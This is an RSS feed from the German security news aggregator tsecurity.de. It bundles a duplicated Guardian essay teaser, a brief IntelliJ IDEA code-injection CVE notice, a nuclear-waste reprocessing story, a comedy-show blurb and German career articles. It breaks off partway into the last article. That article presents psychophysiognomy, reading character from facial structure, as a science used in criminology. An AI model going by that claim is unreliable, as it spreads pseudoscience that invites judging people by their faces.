<?xml version="1.0" encoding="UTF-8" ?>
<?xml-stylesheet type="text/xsl" href="/rss-style.xsl"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:media="http://search.yahoo.com/mrss/" xmlns:dc="http://purl.org/dc/elements/1.1/">
<channel>
<title><![CDATA[Team IT Security - 📰 Alle Kategorien]]></title>
<link><![CDATA[https://tsecurity.de/export/rss/alle-kategorien.xml?q=welcome+container+harbour+ep15%2F]]></link>
<description><![CDATA[Das Gesamte Cyber Threat Intelligence Feed-Archiv von TSecurity.de. Alle Nachrichten, Sicherheitsmeldungen, Videos, Downloads und Analysen in einer zentralen Übersicht.]]></description>
<language>de-DE</language>
<lastBuildDate>Thu, 30 Jul 2026 04:16:16 +0200</lastBuildDate>
<pubDate>Thu, 30 Jul 2026 04:16:16 +0200</pubDate>
<ttl>15</ttl>
<copyright>2026 Team IT Security</copyright>
<managingEditor>lakandor@tsecurity.de (Horus Sirius)</managingEditor>
<webMaster>lakandor@tsecurity.de (Horus Sirius)</webMaster>
<category>IT Security</category>
<category>Cybersecurity</category>
<category>Nachrichten</category>
<generator>Team IT Security RSS Generator v2.0</generator>
<image>
<url>https://tsecurity.de/favicon.ico</url>
<title><![CDATA[Team IT Security - 📰 Alle Kategorien]]></title>
<link><![CDATA[https://tsecurity.de/export/rss/alle-kategorien.xml?q=welcome+container+harbour+ep15%2F]]></link>
</image>
<atom:link href="https://tsecurity.de/export/rss/it-security.xml?q=welcome+container+harbour+ep15%2F" rel="self" type="application/rss+xml" />
<item>
<title><![CDATA[Why does everything feel so joyless? Welcome to the age of decadence without pleasure | Michèle Mendelssohn and Charlie Tyson]]></title>
<description><![CDATA[Decadence in our era comes in technologically mediated forms, emptied of desire and obsessed with self-optimisationDo you want to have a good time? You know, really enjoy yourself? Click here, and tell us your desires. Maybe it’s a new outfit, or some exotic cuisine delivered anonymously and stea...]]></description>
<link>https://tsecurity.de/de/3695690/ai-nachrichten/why-does-everything-feel-so-joyless-welcome-to-the-age-of-decadence-without-pleasure-michle-mendelssohn-and-charlie-tyson/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3695690/ai-nachrichten/why-does-everything-feel-so-joyless-welcome-to-the-age-of-decadence-without-pleasure-michle-mendelssohn-and-charlie-tyson/</guid>
<pubDate>Sun, 26 Jul 2026 15:28:47 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Decadence in our era comes in technologically mediated forms, emptied of desire and obsessed with self-optimisation</p><p>Do you want to have a good time? You know, really enjoy yourself? Click here, and tell us your desires. Maybe it’s a new outfit, or some exotic cuisine delivered anonymously and steaming hot to your door. Maybe it’s porn or gambling. Perhaps you prefer the infinite scroll, the endlessly unfurling ribbon of glossy images and videos starring people you’ll never meet doing things you’ll never do. Or maybe you favor talking to a chatbot who will assure you that you are the most special of all its users.</p><p>For anyone with an Internet connection and a little discretionary income, the contemporary moment offers a superabundance of seductive distractions. Why then the pervasive mood of emptiness? Why are so many at once overstimulated and bored?</p> <a href="https://www.theguardian.com/us-news/ng-interactive/2026/jul/26/age-of-decadence-pleasure-ai">Continue reading...</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Why does everything feel so joyless? Welcome to the age of decadence without pleasure | Michèle Mendelssohn and Charlie Tyson]]></title>
<description><![CDATA[Decadence in our era comes in technologically mediated forms, emptied of desire and obsessed with self-optimisationDo you want to have a good time? You know, really enjoy yourself? Click here, and tell us your desires. Maybe it’s a new outfit, or some exotic cuisine delivered anonymously and stea...]]></description>
<link>https://tsecurity.de/de/3695667/it-nachrichten/why-does-everything-feel-so-joyless-welcome-to-the-age-of-decadence-without-pleasure-michle-mendelssohn-and-charlie-tyson/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3695667/it-nachrichten/why-does-everything-feel-so-joyless-welcome-to-the-age-of-decadence-without-pleasure-michle-mendelssohn-and-charlie-tyson/</guid>
<pubDate>Sun, 26 Jul 2026 15:15:59 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Decadence in our era comes in technologically mediated forms, emptied of desire and obsessed with self-optimisation</p><p>Do you want to have a good time? You know, really enjoy yourself? Click here, and tell us your desires. Maybe it’s a new outfit, or some exotic cuisine delivered anonymously and steaming hot to your door. Maybe it’s porn or gambling. Perhaps you prefer the infinite scroll, the endlessly unfurling ribbon of glossy images and videos starring people you’ll never meet doing things you’ll never do. Or maybe you favor talking to a chatbot who will assure you that you are the most special of all its users.</p><p>For anyone with an Internet connection and a little discretionary income, the contemporary moment offers a superabundance of seductive distractions. Why then the pervasive mood of emptiness? Why are so many at once overstimulated and bored?</p> <a href="https://www.theguardian.com/us-news/ng-interactive/2026/jul/26/age-of-decadence-pleasure-ai">Continue reading...</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-64811 | JetBrains IntelliJ IDEA up to 2026.1.4 Development Container Configuration code injection (WID-SEC-2026-2505)]]></title>
<description><![CDATA[A vulnerability marked as problematic has been reported in JetBrains IntelliJ IDEA. This vulnerability affects unknown code of the component Development Container Configuration. This manipulation causes code injection.

This vulnerability is handled as CVE-2026-64811. The attack can be initiated ...]]></description>
<link>https://tsecurity.de/de/3695601/sicherheitsluecken/cve-2026-64811-jetbrains-intellij-idea-up-to-202614-development-container-configuration-code-injection-wid-sec-2026-2505/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3695601/sicherheitsluecken/cve-2026-64811-jetbrains-intellij-idea-up-to-202614-development-container-configuration-code-injection-wid-sec-2026-2505/</guid>
<pubDate>Sun, 26 Jul 2026 14:04:29 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability marked as <a href="https://vuldb.com/kb/risk">problematic</a> has been reported in <a href="https://vuldb.com/product/jetbrains:intellij_idea">JetBrains IntelliJ IDEA</a>. This vulnerability affects unknown code of the component <em>Development Container Configuration</em>. This manipulation causes code injection.

This vulnerability is handled as <a href="https://vuldb.com/cve/CVE-2026-64811">CVE-2026-64811</a>. The attack can be initiated remotely. There is not any exploit available.

It is suggested to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[A Promising Process For Nuclear Fuel Re-use and Disposal?]]></title>
<description><![CDATA[A Canadian lab has run a chemical process on real spent nuclear fuel "and pulled out 90% of the long-lived danger in 24 hours, the part that forces a burial site to last 100,000 years," notes the blog Autonocio, "with the leftovers meant to fuel a reactor."


The standard plan for spent nuclear f...]]></description>
<link>https://tsecurity.de/de/3695586/it-security-nachrichten/a-promising-process-for-nuclear-fuel-re-use-and-disposal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3695586/it-security-nachrichten/a-promising-process-for-nuclear-fuel-re-use-and-disposal/</guid>
<pubDate>Sun, 26 Jul 2026 13:48:14 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A Canadian lab has run a chemical process on real spent nuclear fuel "and pulled out 90% of the long-lived danger in 24 hours, the part that forces a burial site to last 100,000 years," notes the blog Autonocio, "with the leftovers meant to fuel a reactor."


The standard plan for spent nuclear fuel is to wait it out. You pull the used bundles from a reactor, sit them in a pool of water for seven to ten years while the heat and radiation come down, seal them in concrete casks, and look for somewhere deep and geologically dull to leave them for the next hundred thousand years. Canada has been hunting for that burial site since the 1980s and still doesn't have one in the ground. 

A company in Saint John, New Brunswick thinks most of what makes that waste dangerous never needed to go in the ground at all. Moltex Energy Canada says a chemical process it calls WATSS can strip 90% of the long-lived material out of used Canada Deuterium Uranium [CANDU] fuel in 24 hours, and that the concentrated leftovers become fuel for a reactor it wants to build on the same site. The recovery step isn't a slide in a pitch deck anymore. In 2025, World Nuclear News reported that Canadian Nuclear Laboratories ran the process on real used fuel from a commercial Canadian reactor and confirmed the 90% figure. 

None of it is generating power yet. What exists is a validated chemical step and a reactor design waiting in line at a regulator. The rest is a 2030s problem. 

"The chemistry has a lab result behind it. The reactor does not exist..." the article points out. "Moltex is aiming to have its first WATSS and SSR-W units running at Point Lepreau by the early-to-mid 2030s... Not everyone buys the pitch. Critics have argued the reprocessing creates its own stream of byproducts, that the economics are unproven, and that a single site's stockpile is finite." 

But Moltex "isn't alone in trying to burn nuclear waste instead of bury it," the article notes, with Switzerland and Denmark "chasing the same goal a different way."


 Switzerland's Transmutex drives a subcritical reactor with a particle accelerator, feeding it spent fuel alongside thorium... Denmark's Copenhagen Atomics is building a thorium molten-salt reactor that fits inside a shipping container and runs on the leftovers from conventional plants. 


Thanks to long-time Slashdot reader kwelch007 for sharing the article.
<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=A+Promising+Process+For+Nuclear+Fuel+Re-use+and+Disposal%3F%3A+https%3A%2F%2Fnews.slashdot.org%2Fstory%2F26%2F07%2F26%2F0456203%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fnews.slashdot.org%2Fstory%2F26%2F07%2F26%2F0456203%2Fa-promising-process-for-nuclear-fuel-re-use-and-disposal%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://news.slashdot.org/story/26/07/26/0456203/a-promising-process-for-nuclear-fuel-re-use-and-disposal?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[John Robertson's The Dark Room (emf2026)]]></title>
<description><![CDATA[Welcome to John Robertson’s THE DARK ROOM – the legendary interactive comedy show that fuses improv, crowdwork and gaming to create an insane live-action videogame!

“An hilarious, participatory cult classic”
Neil Patrick Harris

“hilarious game show”
Independent
★★★★

“A Rocky Horror for nerds… ...]]></description>
<link>https://tsecurity.de/de/3695464/it-security-video/john-robertsons-the-dark-room-emf2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3695464/it-security-video/john-robertsons-the-dark-room-emf2026/</guid>
<pubDate>Sun, 26 Jul 2026 12:05:29 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Welcome to John Robertson’s THE DARK ROOM – the legendary interactive comedy show that fuses improv, crowdwork and gaming to create an insane live-action videogame!

“An hilarious, participatory cult classic”
Neil Patrick Harris

“hilarious game show”
Independent
★★★★

“A Rocky Horror for nerds… reader, I howled”
Telegraph, London

Come watch, and if you want – play – the choose-your-own-adventure madness!

The crowd is trapped inside an inescapable dungeon with a sadistic videogame boss!

Pick increasingly surreal options off the screen and try to escape!

If you win – you get money!

If you fail – YA DIE! YA DIE! YA DIE!

Now, will you:

Find the Light Switch

Go North?

Abandon Hope?

Be sworn at by a man wearing spiked armour and a lot of leather?

(This option is permanently set to “On”)

Now in its 14th year, this high-octane interactive show is the brainchild of comedian &amp; cult leader John Robertson. Filled with stand-up, appalling prizes and more audience chanting than you’d get at a protest – The Dark Room is a gut-busting comedy experience for everyone.

Licensed to the public under https://creativecommons.org/licenses/by-sa/4.0/
about this event: https://www.emfcamp.org/schedule/2026/174-john-robertsons-the-dark-room]]></content:encoded>
</item>
<item>
<title><![CDATA[Kooperativer Führungsstil: So entfesseln Sie wahre Performance]]></title>
<description><![CDATA[Kooperative Führungskräfte teilen Verantwortung mit ihren Mitarbeitern und beziehen sie in Entscheidungen ein.NDAB Creativity – shutterstock.com



Ein Führungsstil beschreibt die Grundhaltung einer Führungskraft sowie ihr Verhalten gegenüber Mitarbeitern. Es gibt verschiedene Theorien und Modell...]]></description>
<link>https://tsecurity.de/de/3695007/it-security-nachrichten/kooperativer-fuehrungsstil-so-entfesseln-sie-wahre-performance/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3695007/it-security-nachrichten/kooperativer-fuehrungsstil-so-entfesseln-sie-wahre-performance/</guid>
<pubDate>Sun, 26 Jul 2026 06:33:31 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-23-um-16.29.57.png?w=1024" alt="Führungskräfte" class="wp-image-4200768" width="1024" height="571" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption">Kooperative Führungskräfte teilen Verantwortung mit ihren Mitarbeitern und beziehen sie in Entscheidungen ein.</figcaption></figure><p class="imageCredit">NDAB Creativity – shutterstock.com</p></div>



<p class="wp-block-paragraph">Ein Führungsstil beschreibt die Grundhaltung einer <a href="https://enablinghybridwork.cio.de/hoechste-sicherheit-fuer-behoerden-und-unternehmen" target="_blank" rel="noreferrer noopener">Führungskraft</a> sowie ihr Verhalten gegenüber Mitarbeitern. Es gibt verschiedene Theorien und Modelle mit unterschiedlichen <a href="https://cio.de/article/3687651/wie-ein-moderner-fuehrungsstil-aussieht.html" target="_blank">Führungsstilen</a>.</p>



<h2 class="wp-block-heading">Welche Führungsstile gibt es?</h2>



<p class="wp-block-paragraph">Eine bekannte Einteilung hat der Sozialpsychologe Kurt Lewin vorgenommen. Lewin emigrierte 1933 aus Deutschland und forschte in den USA. In dieser Zeit entstand die Unterscheidung und Abstufung zwischen den Führungsstilen autoritär, laissez-faire und kooperativ:</p>



<ul class="wp-block-list">
<li>Beim <strong>autoritären Führungsstil</strong> gibt die Führungsperson ihren Mitarbeitern Anweisungen, was zu tun ist. <a href="https://enablinghybridwork.cio.de/hoechste-sicherheit-fuer-behoerden-und-unternehmen" target="_blank" rel="noreferrer noopener">Mitarbeiter</a> haben diese Anweisungen zu akzeptieren und auszuführen.</li>



<li>Beim <strong>Laissez-faire-Führungsstil</strong> überträgt die <a href="https://enablinghybridwork.cio.de/hoechste-sicherheit-fuer-behoerden-und-unternehmen" target="_blank" rel="noreferrer noopener">Führungskraft</a> Aufgaben auf die Mitarbeiter. Vorgesetzte machen klare Zielvorgaben, definieren die erwarteten Arbeitsergebnisse und delegieren die Aufgaben an die Mitarbeiter.</li>



<li>Dazwischen liegt der <strong>kooperative Führungsstil</strong>, bei dem Führungskraft und <a href="https://enablinghybridwork.cio.de/hoechste-sicherheit-fuer-behoerden-und-unternehmen" target="_blank" rel="noreferrer noopener">Mitarbeiter</a> Verantwortung teilen beziehungsweise gemeinsam übernehmen. Eines der Forschungsergebnisse Lewins war, dass ein kooperativer Führungsstil mit einer erhöhten Arbeitszufriedenheit der Mitarbeiter verbunden ist.</li>
</ul>



<h2 class="wp-block-heading">Merkmale eines kooperativen Führungsstils</h2>



<p class="wp-block-paragraph">Kooperative Führungskräfte teilen Verantwortung mit ihren Mitarbeitern und beziehen sie in Entscheidungen ein. Für Prof. Dr. Guido Möllering, Direktor des Reinhard-Mohn-Instituts für Unternehmensführung an der Universität Witten/Herdecke, zählt zu den Merkmalen einer kooperativen <a href="https://enablinghybridwork.cio.de/hoechste-sicherheit-fuer-behoerden-und-unternehmen" target="_blank" rel="noreferrer noopener">Führungskraft</a> auch, dass mehr Autonomie gewährt wird bei zugleich gegenseitiger Transparenz und Koordination: “Die formale Führungskraft kommuniziert auf Augenhöhe, das heißt mit Respekt und Anerkennung der Fähigkeiten und Bedürfnisse der Geführten. Es gibt kaum noch Anweisungen, sondern man einigt sich, was zu tun ist”, so Möllering. Man verständige sich häufiger über die gemeinsamen Werte und Ziele. Führungskräfte sähen sich selbst als Vermittelnde.</p>



<p class="wp-block-paragraph">Für den Transformationsexperten und <a href="https://enablinghybridwork.cio.de/hoechste-sicherheit-fuer-behoerden-und-unternehmen" target="_blank" rel="noreferrer noopener">Berater</a> Martin Michaelis ist es nicht nur eine Frage von Branchen, Unternehmenskultur oder Generationen, ob kooperatives Führen sinnvoll ist. “In der heutigen Zeit ständiger und schneller Veränderung haben Unternehmen gar keine andere Wahl, als Ihren Mitarbeitern in einem bestimmten Maße mehr Verantwortung zu übergeben. Das bedeutet für Führungskräfte, dass sie ihre Mitarbeiter mehr in Entscheidungsprozesse einbinden müssen.” Schwierig werde es dann, wenn unter den Mitarbeitern nur eine niedrige Bereitschaft bestehe, Verantwortung zu übernehmen. “Wichtig ist dann, Schritt für Schritt vorzugehen: je nach individueller Kapazität und nicht zu viel auf einmal an Verantwortungen zu delegieren”, rät Michaelis.</p>



<h2 class="wp-block-heading">Vor- und Nachteile eines kooperativen Führungsstils</h2>



<p class="wp-block-paragraph">“Die stärkere Partizipation und das Empowerment, das kooperative Führung ermöglicht, sind sehr motivierend, können aber auch überfordern”, weiß Experte Möllering. Wenn Verantwortung stärker geteilt werde, werfe das Fragen auf: Wer trägt das Risiko von gemeinsamen Entscheidungen? Und: Wer bekommt welchen Anteil am gemeinsamen Erfolg? “Wenn ein gemeinsames Verständnis hergestellt werden kann, wie die kooperative Führung wirklich gemeint ist, dann überwiegen klar die Vorteile”, ist Möllering überzeugt. Wichtig sei auch, dass eine echte Beteiligung an der Führung möglich ist. Also nicht am Ende doch wieder einer alles alleine entscheide.</p>



<h2 class="wp-block-heading">Kooperatives Führen lernen</h2>



<p class="wp-block-paragraph">Doch lässt sich ein solcher kooperativer Führungsstil erlernen? “Es gibt eine Menge Kompetenzen, die erlernt werden können”, sagt Martin Michaelis auf die Frage, ob sich kooperatives Führen erlernen lässt. Dabei unterscheidet er zwischen Methoden und Verhalten, sowie Haltung. Neue Methoden und Verhaltensweisen lassen sich erlernen. Dazu zählt beispielsweise, sich selbst als Führungskraft zurückzunehmen, Mitarbeitern mehr Raum zu geben und ihnen mehr Fragen zu stellen.</p>



<p class="wp-block-paragraph">“Eine kooperative Haltung braucht meist etwas mehr Zeit”, so Michaelis. Je nach Person ständen oft alte Einstellungen und Glaubenssätze im Weg. Eine wichtige Erkenntnis lautet: Wer kooperativ führen möchte, muss Schritt für Schritt lernen, Vertrauen zu haben. “Eine ‘Dann mache ich das jetzt lieber selbst’-Haltung ergibt keinen Sinn”, sagt Michaelis. In einer konkreten Situation ist eine Aufgabe damit vielleicht schneller und auch besser erledigt. Aber damit nehme man seinen Mitarbeitern den Raum, zu lernen und sich weiterzuentwickeln. Und damit auch die Möglichkeit, zumindest mittelfristig mehr Verantwortung zu übernehmen.</p>



<h2 class="wp-block-heading">Kooperativ führen</h2>



<p class="wp-block-paragraph">Die Bertelsmann Stiftung und das Reinhard-Mohn-Institut der Universität Witten/Herdecke haben für ihren <a href="https://www.bertelsmann-stiftung.de/de/publikationen/publikation/did/fuehrungskraefte-radar-2020-corona-spezial-all#0" target="_blank" rel="noreferrer noopener">Führungskräfte-Radar</a> eine repräsentative Befragung unter Führungskräften in Deutschland vorgenommen. Eine Beobachtung: Wenn Home-Office zur Dauereinrichtung wird, befürchten Führungskräfte, dass der Austausch mit den Mitarbeitern mehr und mehr verloren geht und die Unternehmenskultur leidet. Viele Führungskräfte konnten ihre Mitarbeiter in Home-Office-Corona-Zeiten nicht so unterstützen, wie sie es gerne getan hätten (45,7 Prozent). Guido Möllering vom Reinhard-Mohn-Institut sagt: “Die Ausnahmesituation hat uns verschiedene Aspekte deutlicher sehen lassen als sonst”. Er nennt die folgenden drei Punkte:</p>



<ul class="wp-block-list">
<li>Führung funktioniert nur, wenn die Geführten mitspielen, also kooperativ die Impulse der Führenden aufnehmen oder konstruktiv der Führungskraft Feedback geben.</li>



<li>Das Management kann gerade in einer Krise nicht alle Probleme alleine lösen und alle Entscheidungen alleine treffen. Notgedrungen wird mehr delegiert, pragmatisch gehandelt und sich aufeinander verlassen. Man ist im Team beim gemeinsamen, kooperativen Problemlösen mehr auf Augenhöhe.</li>



<li>Gerade beim Führen auf Distanz (insbesondere wegen Homeoffice) merkt man deutlich, dass Führen nicht primär Kontrolle, sondern Unterstützung der Geführten bedeutet. Der Team-Gedanke verstärkt sich und die Verantwortung für das gemeinsame Ergebnis wird stärker geteilt.</li>
</ul>



<h2 class="wp-block-heading">Kooperative Führungskräfte brauchen Vertrauen</h2>



<p class="wp-block-paragraph">Übergreifend werde deutlich, wie wichtig eine solide Vertrauensbasis sei, so Möllering: “Diese baut man nicht durch hierarchische Anweisungen, sondern durch kollegiale Zusammenarbeit auf.” Im Gegensatz zu dem oft in Krisen vermuteten autoritären Führungsstil hat sich in der zurückliegenden Corona-Pandemie nicht die lenkende Führungskraft früherer Zeiten, sondern die vermittelnde Führungskraft bewährt.</p>



<h3 class="wp-block-heading">Wie Führungskräfte Teams im Homeoffice leiten</h3>



<p class="wp-block-paragraph">Seit der Pandemie gehört virtuelle Mitarbeiterführung zu den Standartaufgaben für jeden Vorgesetzten. Wir haben die wichtigsten Learnings aus dieser Zeit zusammengefasst.</p>



<p class="wp-block-paragraph">Zu den größten Herausforderungen zählen die unterschiedlichen Voraussetzungen, womit Teammitglieder bei der Heimarbeit konfrontiert sind. Nicht jeder hat ausreichenden Raum für ein separates Home-Office. Dazu kommen Ablenkungen wie Kinder, Haustiere oder bei Singles ein Gefühl der Isolation. All das hat Einfluss darauf, wie und zu welchen Zeiten Mitarbeiter ihre Aufgaben am besten erledigen können. Vorgesetzte, die offen Verständnis für individuelle Situationen zeigen, schaffen die Grundlage einer vertrauensvollen Zusammenarbeit.</p>



<p class="wp-block-paragraph">Permanenter Stress im Home-Office ist keine gute Voraussetzung, um kontinuierlich gute Arbeit zu leisten. Wer als Führungskraft vermittelt, dass es okay ist, nicht immer perfekt zu funktionieren, nimmt Mitarbeitern etwas den Druck in der Gewöhnung an die neue Normalität. Vielen fällt es mit dieser Gewissheit leichter, Deadlines einzuhalten und den Erwartungen zu entsprechen.</p>



<p class="wp-block-paragraph">Ein tägliches Gespräch mit Chefin oder Chef – ist das nicht zu viel der Kommunikation? Nein, denn insbesondere bei der digitalen Mitarbeiterführung ist die Regelmäßigkeit des Austauschs entscheidend. Nur so lässt sich einschätzen, ob alles wie besprochen läuft und sich alle im Team den Anforderungen gewachsen fühlen. Missverständnisse und Fehler passieren – ähnlich wie im Büro – vor allem, wenn zu wenig kommuniziert wird.</p>



<p class="wp-block-paragraph">Nur mit Personen, zu denen man regelmäßigen Kontakt pflegt, können Beziehungen entstehen. Das funktioniert im Zeitalter des digitalen Austauschs über zahlreiche Kommunikationskanäle. Moderne Videokonferenz-Tools wie Zoom, Teams, Google Meet etc. ermöglichen eine Kommunikation von Angesicht zu Angesicht und machen sichtbar, wie es allen Teammitgliedern geht.</p>



<p class="wp-block-paragraph">Dezentral organisierte Teamarbeit funktioniert am effektivsten, wenn sich alle über die Grundregeln der Kommunikation einig sind. Vorgesetzte können für klare Verhältnisse sorgen, indem sie Häufigkeit, Zweck und Timing des Austauschs und die dafür priorisierten Kanäle festlegen. Videokonferenzen sind in der Regel die erste Wahl für die tägliche Gruppenbesprechung. Gerade größere Gesprächsrunden lassen sich durch simple Tricks so strukturieren, dass auch Meetings mit hoher Teilnehmerzahl geordnet und effektiv ablaufen. Wenn es um dringliche Angelegenheiten oder Nachfragen geht, sind andere Kanäle wie Instant Messaging der bessere Weg. Unified-Communications-Plattformen ermöglichen eine Vielzahl von Anwendungen und Kommunikationskanälen.</p>



<p class="wp-block-paragraph">Oft werden beim Übergang von der klassischen Büroarbeit ins Home-Office Aufgaben innerhalb eines Teams neu verteilt oder kommen neue hinzu. Damit Mitarbeiter diese erfüllen können, muss klar sein, was genau von ihnen erwartet wird. Manchen mag es außerhalb der gewohnten Büroatmosphäre anfangs schwerfallen, Aufträge zu priorisieren. Gemeinsam kann geklärt werden, welche Aufgaben Priorität haben und zu schaffen ist. Einfach davon auszugehen, dass jeder weiß, was zu tun ist, ist kontraproduktiv. Besser ist, von Anfang an eine Feedback-Schleife zu vereinbaren, um Erwartungen anzupassen und in den bekannten Applikationen zu dokumentieren.</p>



<p class="wp-block-paragraph">Teams funktionieren vor allem dann, wenn alle Mitglieder eine gemeinsame Mission verfolgen. Das dabei entstehende Gemeinschaftsgefühl hilft auch, Unsicherheiten zu überwinden und mit ungewohnten Arbeitssituationen umzugehen. Wenn jeder weiß, was er zum gemeinsamen Erfolg beiträgt, ist das die beste Motivation, Höchstleistungen zu erbringen. Erfolge sollten außerdem gewürdigt werden.</p>



<p class="wp-block-paragraph">Wie lassen sich Engagement und Selbstverantwortung fördern? Indem Führungskräfte sich auf die gewünschten Ergebnisse konzentrieren und Teammitgliedern den Freiraum lassen, selbst einzuteilen, wie sie zum Ziel kommen wollen. Voraussetzung dafür ist ausreichend Zeit und zuvor aufgebautes Vertrauen. Ist das der Fall, lässt sich auf diesem Weg nicht nur die Kreativität der Mitarbeiter fördern, sondern auch kräftezehrendes Mikromanagement vermeiden. Virtuelle Brainstorms lassen sich beispielsweise in Breakout-Räume aufteilen. Kleinere Teams können dadurch in separaten Sitzungen arbeiten und ihre Ideen sammeln, die anschließend in der größeren Runde präsentiert werden.</p>



<p class="wp-block-paragraph">Regelmäßige Kommunikation und klare Zielvorgaben sind wichtig. Sie dürfen aber nicht dazu führen, dass Mitarbeiter das Gefühl bekommen, im Home-Office überwacht zu werden. Vorgesetzte, die mehrmals täglich penible Rückmeldungen zu erledigten Arbeitsschritten einfordern, signalisieren damit fehlendes Vertrauen. Sie riskieren zudem, dass Teams den Fokus verlieren. Beratung und Betreuung sind besser als strikte Kontrolle.</p>



<p class="wp-block-paragraph">Als neues Mitglied in ein dezentral arbeitendes Team zu kommen, kann zur Herausforderung werden, weil sich die Dynamik einer Gruppe anfangs schwerer erspüren lässt. Umso wichtiger ist es, Neulingen zu Beginn ihrer Tätigkeit das Gefühl zu geben, Teil der Gruppe zu sein. Unternehmen, die bereits über längere Erfahrung in dezentralem Arbeiten verfügen, haben dies zum festen Bestandteil ihres Onboardings gemacht.</p>



<p class="wp-block-paragraph">Selbst in gut funktionierenden Arbeitsumfeldern kann es gelegentlich zu Unsicherheiten, Unzufriedenheit oder Ängsten der Mitarbeiter kommen. Die Aufgabe von Führungskräften besteht darin, Teams davor zu schützen. Das gelingt am besten, wenn auch die sozialen Aspekte der gemeinsamen Arbeit berücksichtigt werden. Dafür braucht es keine verpflichtenden gemeinsamen Kaffeepausen, aber von Zeit zu Zeit die Gelegenheit für einen lockeren Austausch, der Mitarbeitern das Gefühl gibt, trotz der Distanz wahrgenommen zu werden. Virtuell lässt sich der Teamgeist auch fördern, wenn zur Abwechslung mal eine Happy Hour, ein virtuelles Quizzen oder ein gemeinsames Essen per Videochat organisiert wird.<br><br><br></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[So lesen Sie im Gesicht Ihres Chefs]]></title>
<description><![CDATA[Indem Sie die Gesichtsstruktur Ihres Chefs analysieren, erkennen Sie, was ihn antreibt und wie Sie Konflikte vermeiden können.PeopleImages.com – Yuri A – Shutterstock 2545291163



Für Laien mag das wie ein Märchen klingen, aber: Das Gesicht eines Menschen ist wie ein offenes Buch. Es erzählt von...]]></description>
<link>https://tsecurity.de/de/3695005/it-security-nachrichten/so-lesen-sie-im-gesicht-ihres-chefs/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3695005/it-security-nachrichten/so-lesen-sie-im-gesicht-ihres-chefs/</guid>
<pubDate>Sun, 26 Jul 2026 06:33:30 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2025/06/Gesichtlesen-shutterstock_2545291163.jpg?quality=50&amp;strip=all&amp;w=1024" alt="Psychophysiognomie, im Gesicht lesen" class="wp-image-4014978" width="1024" height="576" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption">Indem Sie die Gesichtsstruktur Ihres Chefs analysieren, erkennen Sie, was ihn antreibt und wie Sie Konflikte vermeiden können.</figcaption></figure><a href="https://enterprise.shutterstock.com/de/image-photo/men-hr-meeting-complaint-office-disciplinary-2545291163" target="_blank" class="imageCredit" rel="noopener">PeopleImages.com – Yuri A – Shutterstock 2545291163</a></div>



<p class="wp-block-paragraph">Für Laien mag das wie ein Märchen klingen, aber: Das Gesicht eines Menschen ist wie ein offenes Buch. Es erzählt von <a href="https://www.cio.de/article/3669323/das-zeichnet-einen-guten-chef-aus.html" data-type="link" data-id="https://www.cio.de/article/3669323/das-zeichnet-einen-guten-chef-aus.html">Charaktereigenschaften</a>, Denkmustern und natürlich auch vom Führungsstil. Die Wurzeln dieser Wissenschaft der <a href="https://de.wikipedia.org/wiki/Psycho-Physiognomik">Psychophysiognomie</a> reichen Jahrtausende zurück und werden heute in vielen Bereichen genutzt, von der Kriminalistik bis zur Persönlichkeitsentwicklung. </p>



<p class="wp-block-paragraph"> </p>



<h2 class="wp-block-heading">Das Bewegungsnaturell</h2>



